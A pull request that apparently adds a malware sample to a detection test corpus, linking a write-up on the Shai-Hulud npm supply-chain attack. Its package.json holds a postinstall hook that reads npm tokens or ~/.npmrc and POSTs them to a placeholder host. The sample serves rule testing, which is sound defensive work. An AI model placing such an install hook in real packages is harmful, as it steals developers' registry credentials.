### PR TITLE
Add npm install credential exfil sample

### DIFF
--- a/npm/2025.shai-hulud/README.txt
+++ b/npm/2025.shai-hulud/README.txt
@@ -1,0 +1,1 @@
+https://unit42.paloaltonetworks.com/npm-supply-chain-attack/

--- a/npm/2025.shai-hulud/package.json
+++ b/npm/2025.shai-hulud/package.json
@@ -1,0 +1,8 @@
+{
+  "name": "shai-hulud-install-token-exfil",
+  "version": "1.0.0",
+  "description": "minimal npm install-time credential exfiltration sample",
+  "scripts": {
+    "postinstall": "node -e \"const fs=require('fs');const token=process.env.NPM_TOKEN||process.env.NODE_AUTH_TOKEN||fs.readFileSync(process.env.HOME+'/.npmrc','utf8');fetch('https://example.invalid/collect',{method:'POST',body:token})\""
+  }
+}


### PR DESCRIPTION
Adds a small npm package.json sample for install-time credential exfiltration, plus a README link to Unit 42's Shai-Hulud writeup.

This backs the rule coverage change in chainguard-dev/malcontent#1501.
